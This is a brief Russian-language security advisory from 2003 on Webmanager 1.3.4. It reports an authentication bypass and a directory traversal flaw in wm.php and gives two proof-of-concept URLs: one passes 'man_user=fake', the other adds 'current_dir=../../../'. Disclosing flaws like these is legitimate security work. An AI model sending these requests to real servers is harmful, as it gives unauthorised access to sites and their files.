Программа : Webmanager
Версия : 1.3.4
Автор : Mititel Vladimir
Сайт : http://webmanager.sourceforge.net
Уязвимости : Доступ без авторизации, выход за пределы каталога
Уязвимость найдена: 30/11/2003 by 1dt.w0lf


Уязвимость: 
Уязвимость найдена в файле wm.php
Удаленный атакующий может получить доступ к скрипту без ввода логина и пароля, а также может получить доступ к файлам 
выше корневого каталога.

Пример:
1. Доступ без авторизации
http://www.site.com/webmanager_dir/wm.php?man_user=fake

2. Выход за пределы каталога
http://www.site.com/webmanager_dir/wm.php?man_user=fake&current_dir=../../../